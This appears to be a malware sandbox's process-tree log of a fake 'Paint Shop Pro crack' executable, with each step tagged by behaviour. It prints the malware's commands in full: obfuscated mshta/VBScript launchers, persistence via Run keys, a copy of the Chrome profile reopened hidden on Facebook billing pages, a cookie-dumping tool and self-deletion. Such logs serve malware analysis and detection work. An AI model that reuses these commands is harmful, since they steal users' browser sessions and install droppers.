c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\tffiwcdC:\Users\Admin\AppData\Roaming\tffiwcd2⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Roaming\tffiwcd"C:\Users\Admin\AppData\Roaming\tffiwcd"3⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd2⤵
-
C:\Users\Admin\AppData\Roaming\bwfiwcdC:\Users\Admin\AppData\Roaming\bwfiwcd3⤵
-
C:\Users\Admin\AppData\Roaming\tffiwcdC:\Users\Admin\AppData\Roaming\tffiwcd2⤵
-
C:\Users\Admin\AppData\Roaming\tffiwcd"C:\Users\Admin\AppData\Roaming\tffiwcd"3⤵
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"C:\Users\Admin\AppData\Local\Temp\Temp2_Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.zip\Jasc_Paint_Shop_Pro_9_0_crack_by_TSRh.exe"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "2⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exekeygen-pr.exe -p83fsase3Ge3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exeC:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat5⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exekeygen-step-1.exe3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exekeygen-step-5.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF """" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "" == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -IM "%~nXV" -F> nul5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "keygen-step-5.exe" -F6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\uQLGv.exeuQLGv.exe -P5x35C~QWmaAR8osCre6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBsCriPt: CLOse ( cReatEoBJEcT ( "wSCrIPT.sHelL" ). RUn ( "cmD.EXe /Q /C COpY /y ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" uQLGv.exe > Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF ""-P5x35C~QWmaAR8osCre "" == """" for %V In ( ""C:\Users\Admin\AppData\Local\Temp\uQLGv.exe"" ) do taskkill -IM ""%~nXV"" -F > nul " , 0) )7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C COpY /y "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" uQLGv.exe> Nul && StArT uQLGv.exe -P5x35C~QWmaAR8osCre & iF "-P5x35C~QWmaAR8osCre " == "" for %V In ( "C:\Users\Admin\AppData\Local\Temp\uQLGv.exe" ) do taskkill -IM "%~nXV" -F> nul8⤵
-
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" .\ma0IL_U1.C_T -u /s7⤵
- Loads dropped DLL
- Suspicious use of NtCreateThreadExHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exekeygen-step-2.exe3⤵
- Executes dropped EXE
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\2130.tmp.exe"C:\Users\Admin\AppData\Roaming\2130.tmp.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\2130.tmp.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK6⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.15⤵
- Executes dropped EXE
- Modifies registry class
- Runs ping.exe
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exekeygen-step-3.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 1.1.1.1 -n 1 -w 30005⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exekeygen-step-4.exe3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Free.exe"4⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install5⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\JoSetp.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\5661775.exe"C:\ProgramData\5661775.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\ProgramData\3274620.exe"C:\ProgramData\3274620.exe"5⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"4⤵
- Executes dropped EXE
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y5⤵
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/5⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87ef74f50,0x7ff87ef74f60,0x7ff87ef74f706⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1920 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1552 /prefetch:26⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2360 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2700 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2716 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2344 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3760 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:16⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4972 /prefetch:86⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=5384 /prefetch:86⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1512,8543283011652108014,12514630251655961029,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2188 /prefetch:86⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-2M6N7.tmp\Install.tmp"C:\Users\Admin\AppData\Local\Temp\is-2M6N7.tmp\Install.tmp" /SL5="$40372,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX1\Install.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-RR25L.tmp\Ultra.exe"C:\Users\Admin\AppData\Local\Temp\is-RR25L.tmp\Ultra.exe" /S /UID=burnerch16⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe"C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe" /VERYSILENT7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-B9A2I.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-B9A2I.tmp\ultramediaburner.tmp" /SL5="$4036E,281924,62464,C:\Program Files\Windows Security\LSUXGVCTMU\ultramediaburner.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\15-fff3c-1e7-c13b5-9e247f9e88b64\Jaeqefaejisho.exe"C:\Users\Admin\AppData\Local\Temp\15-fff3c-1e7-c13b5-9e247f9e88b64\Jaeqefaejisho.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\d3-54686-f99-ae7bd-451dffab23bbd\Tugaeharuxae.exe"C:\Users\Admin\AppData\Local\Temp\d3-54686-f99-ae7bd-451dffab23bbd\Tugaeharuxae.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exeC:\Users\Admin\AppData\Local\Temp\lq2grlrs.psi\gaoou.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
C:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exeC:\Users\Admin\AppData\Local\Temp\ktetzzug.3kl\google-game.exe9⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exeC:\Users\Admin\AppData\Local\Temp\owwlxid0.auv\md1_1eaf.exe9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exeC:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\xh4sm0b1.hgj\build.exe" & del C:\ProgramData\*.dll & exit10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exeC:\Users\Admin\AppData\Local\Temp\prwnihee.fni\askinstall36.exe9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe11⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/10⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff87e8f4f50,0x7ff87e8f4f60,0x7ff87e8f4f7011⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1724 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1696 /prefetch:211⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2160 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3840 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:111⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=3920 /prefetch:211⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2356 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3836 /prefetch:811⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1692,10096795762473748926,17044679151280545239,131072 --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=3812 /prefetch:811⤵
-
